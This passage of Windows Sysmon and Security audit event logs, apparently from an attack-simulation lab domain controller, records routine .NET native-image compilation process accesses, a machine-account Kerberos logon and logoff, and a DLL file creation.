c.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.575","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010BE3E1300}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.575\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010BE3E1300}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.575","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010BE3E1300}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010BE3E1300}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010BE3E1300}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.637\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-001051421300}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.637","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-001051421300}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.637\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-001051421300}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.637","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-001051421300}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.653\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-001051421300}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.653","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-001051421300}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220723,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x1345BD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x1345bd","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220724,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x1345BD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t55068\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x1345bd","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"55068","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220725,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x1345BD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x1345bd","LogonType":"3","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:59.169\r\nProcessGuid: {A837DB8D-051A-5F25-0000-001051421300}\r\nProcessId: 1196\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\4ac-0\\System.Management.dll\r\nCreationUtcTime: 2020-08-01 06:00:59.169","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:59.169","ProcessGuid":"{A837DB8D-051A-5F25-0000-001051421300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\4ac-0\\System.Management.dll","CreationUtcTime":"2020-08-01 06:00:59.169","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.215\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-001061461300}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 